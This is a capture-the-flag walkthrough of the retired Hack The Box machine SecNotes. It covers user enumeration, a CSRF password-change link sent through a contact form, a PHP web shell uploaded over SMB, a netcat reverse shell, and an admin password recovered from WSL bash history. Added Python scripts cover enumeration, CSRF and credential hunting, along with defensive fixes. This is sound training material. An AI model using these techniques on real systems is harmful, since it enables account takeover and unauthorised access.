OSCP PREPARATIONS – HTB SecNotes

SecNotes is a retired Hack The Box machine running Windows. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the services exposed by the target.
Classic Scan

Full Port Scan

The scans show three open ports: 80/tcp (Microsoft IIS httpd 10.0), 445/tcp (Windows 10 Enterprise 17134 microsoft-ds, workgroup HTB) and 8808/tcp, which nmap labels ssports-bcast purely from its port-name table; as we see later, it is a second IIS site.
We begin enumeration on port 80.

We are greeted by a login page. Default credentials, the page source and a web technology analyser yielded nothing useful.
We scanned with Gobuster and did not find any noteworthy directories.

We create a user by clicking the “Sign up now” button.

We register a user named Muhammed and log in with those credentials.

The notable item here is the e-mail address tyler@secnotes.htb: it gives us the domain name and suggests that a user named tyler exists.
Let's test whether this user exists.
This is the error returned for an invalid username:

And this is the different error returned for a valid username (the application leaks which of the two failed, which is what makes enumeration possible):
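The manual comparison above (one message for an unknown username, another for a known one) is easy to automate. The following is an added example and not part of the original write-up: it classifies a login response by its error text and runs a candidate list through it. The two marker strings and the form field names are assumptions, since the write-up shows the error pages only as screenshots; a constructed fake target stands in for the real host so the script runs offline.

```python
"""Username enumeration from differing login error messages.

Added example, not from the original write-up: automates the manual check.
The marker strings and form field names are ASSUMPTIONS (the write-up shows
the error pages only as screenshots); replace them with the observed values.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

# ASSUMED fragments of the two distinct error pages.
NO_SUCH_USER = "No account found with that username"
WRONG_PASSWORD = "The password you entered was not valid"


def classify(body: str) -> str:
    """Map one login response body to valid-user / no-such-user / unknown."""
    if NO_SUCH_USER in body:
        return "no-such-user"
    if WRONG_PASSWORD in body:
        return "valid-user"
    return "unknown"   # lockout page, WAF block, changed wording: stop and look


def enumerate_users(candidates: Iterable[str],
                    send: Callable[[str], str]) -> Dict[str, str]:
    """Attempt each candidate with a dummy password and classify the response.

    `send(username)` performs one login attempt and returns the body, so the
    same logic runs against the constructed fake below or a real host.
    """
    return {name: classify(send(name)) for name in candidates}


def http_sender(login_url: str, user_field: str = "username",
                pass_field: str = "password") -> Callable[[str], str]:
    """Sender that POSTs to the real form (field names are assumptions)."""
    def send(username: str) -> str:
        data = urllib.parse.urlencode({user_field: username, pass_field: "x"}).encode()
        req = urllib.request.Request(login_url, data=data)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:   # 4xx/5xx bodies still carry the message
            return err.read().decode(errors="replace")
    return send


def fake_sender(existing_users: Iterable[str]) -> Callable[[str], str]:
    """Constructed stand-in for the target, mimicking its two error pages."""
    known = {u.lower() for u in existing_users}

    def send(username: str) -> str:
        msg = WRONG_PASSWORD if username.lower() in known else NO_SUCH_USER
        return f"<html><body><div class='error'>{msg}</div></body></html>"
    return send


if __name__ == "__main__":
    send = fake_sender(["tyler", "muhammed"])
    for name, verdict in enumerate_users(["admin", "tyler", "guest"], send).items():
        print(f"{name:10s} {verdict}")
```

Once the real strings are known, swap `fake_sender` for `http_sender` pointed at the login URL. Treat an "unknown" verdict as a reason to stop and look (lockout, WAF, reworded page), not as a negative result; and if the two responses differ only in length or timing rather than text, compare those instead.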

Now let's check the username tyler:

The response confirms that tyler is an existing user. Default passwords and a SQL injection attempt against the login form were unsuccessful, so we log in with the account we created and enumerate the application's features.
Create New Note

Change Password

Here we find a common weakness in password change mechanisms: the application does not verify that the user knows the current password. Password recovery flows also let a user set a new password without knowing the old one, but they normally add a verification step, such as sending a reset link to the e-mail address associated with the account. When the current password is not required, an attacker who can make the victim issue a crafted password change request takes over the account.
So we need a way to make the user issue that request.
Contact Us:

The contact form delivers a message to the site's user. To see whether anything on the other side follows links in that message, we submit a URL pointing to our own IP address and listen with nc.
We enter our local IP address in the contact form and start the nc listener.

Shortly after submitting the form, a request arrives at our nc listener.

The User-Agent shows the request was made by Windows PowerShell, so something on the target automatically fetches URLs submitted through the form.
If tyler's side fetches whatever link we send, a crafted password change URL will be requested with his session. CSRF tokens would block this, but the application does not implement them, and we have already seen that the change form does not ask for the current password. In Burp we change the “Change Password” request from POST to GET so that all parameters sit in the URL, and submit the resulting link through the contact form.

The POST request converted to GET:

GET /change_pass.php?password=password1&confirm_password=password1&submit=submit HTTP/1.1

Once the link is submitted, the target fetches it just as it fetched our earlier test URL, and the change is applied under tyler's session.
Can we log in right away?
As user tyler, with
tyler:password1
we log in successfully.
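To make the weakness concrete, here is an added example (not the SecNotes source, which the write-up does not show) that models change_pass.php in two forms: the behaviour observed above, where any request with matching password fields changes the password, and a hardened version that rejects GET, requires a CSRF token bound to the session and requires the current password. The parameter names come from the captured GET request; the session and token handling are assumptions, and the password store is plaintext only to keep the model short.

```python
"""Password change without re-authentication, delivered through CSRF.

Added example modelling the observed change_pass.php behaviour (not the
SecNotes source). Parameter names come from the captured GET request; the
session/CSRF-token mechanics are an assumption; passwords are stored in
plaintext only to keep the model short (real code stores salted hashes).
"""
import hmac
import secrets
import urllib.parse
from dataclasses import dataclass, field

CHANGE_PASS_PATH = "/change_pass.php"


@dataclass
class Session:
    """Server-side state bound to the victim's cookie (assumed model)."""
    username: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    params: dict        # query string and body merged, like PHP's $_REQUEST
    session: Session    # whoever's cookie the browser attached


def _eq(a: str, b: str) -> bool:
    """Constant-time string comparison for tokens and passwords."""
    return hmac.compare_digest(a.encode(), b.encode())


def build_csrf_url(base: str, new_password: str) -> str:
    """The link the attacker submits through 'Contact Us' (parameters as captured)."""
    query = urllib.parse.urlencode(
        {"password": new_password, "confirm_password": new_password, "submit": "submit"})
    return f"{base}{CHANGE_PASS_PATH}?{query}"


def change_password_vulnerable(users: dict, req: Request) -> bool:
    """Observed behaviour: any HTTP method, no current password, no CSRF token."""
    p = req.params
    if p.get("submit") != "submit" or not p.get("password"):
        return False
    if p["password"] != p.get("confirm_password"):
        return False
    users[req.session.username] = p["password"]
    return True


def change_password_hardened(users: dict, req: Request) -> bool:
    """A state change must be a POST, carry this session's CSRF token and
    prove knowledge of the current password; otherwise nothing changes."""
    p = req.params
    if req.method != "POST":
        return False  # GET (a clicked or prefetched link) must never change state
    if not _eq(p.get("csrf_token", ""), req.session.csrf_token):
        return False  # token missing or forged: cross-site request
    if not _eq(p.get("current_password", ""), users.get(req.session.username, "")):
        return False  # attacker cannot supply this even with a live victim session
    if not p.get("password") or p["password"] != p.get("confirm_password"):
        return False
    users[req.session.username] = p["password"]
    return True


def follow_link(handler, users: dict, victim: Session, url: str) -> bool:
    """Victim's browser (or the PowerShell fetcher seen above) requests the
    attacker's URL with the victim's own session attached."""
    params = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(url).query))
    return handler(users, Request("GET", params, victim))


if __name__ == "__main__":
    tyler = Session("tyler")
    link = build_csrf_url("http://secnotes.htb", "password1")
    for name, handler in (("vulnerable", change_password_vulnerable),
                          ("hardened", change_password_hardened)):
        db = {"tyler": "old-secret"}
        changed = follow_link(handler, db, tyler, link)
        print(f"{name:10s} link followed -> changed={changed}, tyler now {db['tyler']!r}")
```

Each of the three checks in the hardened handler defeats the attack on its own: a GET-only link cannot reach a POST-only handler, a cross-site request cannot carry a token the attacker never saw, and a session riding attack cannot supply a current password the attacker does not know. Requiring all three is the usual defence in depth.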

Looking through tyler's notes, we find credentials:

tyler : 92g!mA8BGjOirkL%OG*&

We use these credentials for SMB enumeration.

An SMB share named new-site is listed, and we connect to it.

The share contains iisstart.htm, the default IIS start page, so it is probably the web root of a second site. Let's look at port 8808 from the nmap scan.

Port 8808 shows the same default IIS start page, so the new-site share is very likely its web root. Let's test whether a file we upload to the share is served from here.
We upload a file named test.txt to the share and check whether it appears.

test.txt is served from port 8808 and its content is displayed, so we have write access to the web root. Next we create a PHP web shell and see whether it runs.
We create shell.php and upload it to the share in the same way.

Now we browse to the shell:

We have command execution on the target.
To turn this into a reverse shell, we transfer nc to the target and run it from the web shell so that it connects back to our listener.

We get a reverse shell as secnotes\tyler.

This gives us the user flag, but not the root flag.

So we continue with local enumeration.

We find bash.exe on the Windows host, which means the Windows Subsystem for Linux is installed. Let's see whether we can make use of it.

Running bash drops us into the Linux subsystem as root, but this is root of the WSL environment, not the Windows Administrator account, so we still cannot reach the Administrator's files.

We see the /mnt directory, where WSL mounts the Windows drives.
Let's look around.

We have access to the subsystem's own Linux file system.
We go to /root and continue enumerating.

In /root/.bash_history we find the administrator's password in a previously typed command.
Let's connect with smbclient using it.

Connected successfully.
Here we get the root flag.

We have the root flag.
Alternatively, with the administrator credentials, Impacket's psexec.py would have given us a SYSTEM shell directly.
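The privilege escalation hinged on a password left behind in /root/.bash_history. As an added example (not from the write-up), the script below scans shell-history lines for the common ways credentials end up there: smbclient -U user%pass, net use ... /user:, mysql -p, curl -u, sshpass -p and exported *_PASSWORD/*_SECRET/*_TOKEN variables. The sample history is constructed, the pattern list is a starting set rather than an exhaustive one, and the real password from the machine is deliberately not reproduced.

```python
"""Hunting for credentials left in shell history.

Added example, not from the write-up. Scans history-style lines for the
common ways a password ends up in .bash_history. SAMPLE_HISTORY is
CONSTRUCTED (the real machine's password is deliberately not reproduced);
the pattern list is a starting set, not an exhaustive one.
"""
import re
from typing import Iterable, List, NamedTuple, Optional


class Finding(NamedTuple):
    lineno: int
    tool: str
    user: Optional[str]
    secret: str


# (tool, regex, user group, secret group); user group 0 means "no user captured"
PATTERNS = [
    # smbclient -U 'user%pass' //host/share
    ("smbclient", re.compile(r"smbclient\b.*?-U\s+['\"]?([^'\"\s%]+)%([^'\"\s]+)"), 1, 2),
    # net use Z: \\host\share PASS /user:DOMAIN\user (no password -> prompt -> no match)
    ("net use", re.compile(r"net\s+use\s+(?:[A-Za-z]:\s+)?\\\\\S+\s+(\S+)\s+/user:(\S+)", re.I), 2, 1),
    # mysql -u user -pPASS (a bare -p prompts and leaks nothing)
    ("mysql", re.compile(r"mysql\b.*?\s-u\s*(\S+)\s.*?-p(\S+)"), 1, 2),
    # curl -u user:pass URL
    ("curl", re.compile(r"curl\b.*?\s(?:-u|--user)\s+['\"]?([^'\":\s]+):([^'\"\s]+)"), 1, 2),
    # sshpass -p 'pass' ssh user@host
    ("sshpass", re.compile(r"sshpass\s+-p\s*['\"]?([^'\"\s]+)['\"]?\s+ssh\b.*?\s([^\s@]+)@"), 2, 1),
    # export SOMETHING_PASSWORD=..., FOO_SECRET=..., API_TOKEN=...
    ("env", re.compile(r"\b([A-Za-z_]*(?:PASS(?:WORD)?|SECRET|TOKEN)[A-Za-z0-9_]*)=['\"]?([^'\"\s]+)", re.I), 1, 2),
]


def find_credentials(lines: Iterable[str]) -> List[Finding]:
    """Return every credential-bearing command, in file order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(lines, start=1):
        for tool, rx, ugrp, sgrp in PATTERNS:
            m = rx.search(line)
            if m:
                findings.append(Finding(lineno, tool, m.group(ugrp) if ugrp else None, m.group(sgrp)))
    return findings


def redact(secret: str, keep: int = 2) -> str:
    """Show only a short prefix so findings can be reported without re-leaking them."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


# Constructed sample history; none of these values comes from the real machine.
SAMPLE_HISTORY = r"""ls -la /mnt/c/Users
cd /mnt/c/Users/tyler/Desktop
smbclient -U 'administrator%Wint3r!Ch1ll' //10.10.10.97/c$ -c 'ls'
mysql -u root -pToor123 secnotes
curl -u svc_backup:B4ckup#2018 http://10.10.10.97:8808/
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
net use Z: \\10.10.10.97\c$ Wint3r!Ch1ll /user:SECNOTES\administrator
sshpass -p 'hunter2' ssh tyler@10.10.14.3
mysql -u root -p secnotes
"""


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_HISTORY.splitlines()):
        print(f"line {f.lineno:>3}  {f.tool:10s} user={f.user!r:30s} secret={redact(f.secret)}")
```

On a real host, feed it the contents of every history file you can read (.bash_history, .zsh_history, PowerShell's ConsoleHost_history.txt under AppData), not just root's. The same scan is equally useful from the defensive side as a periodic check for secrets that should never have been typed on a command line.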
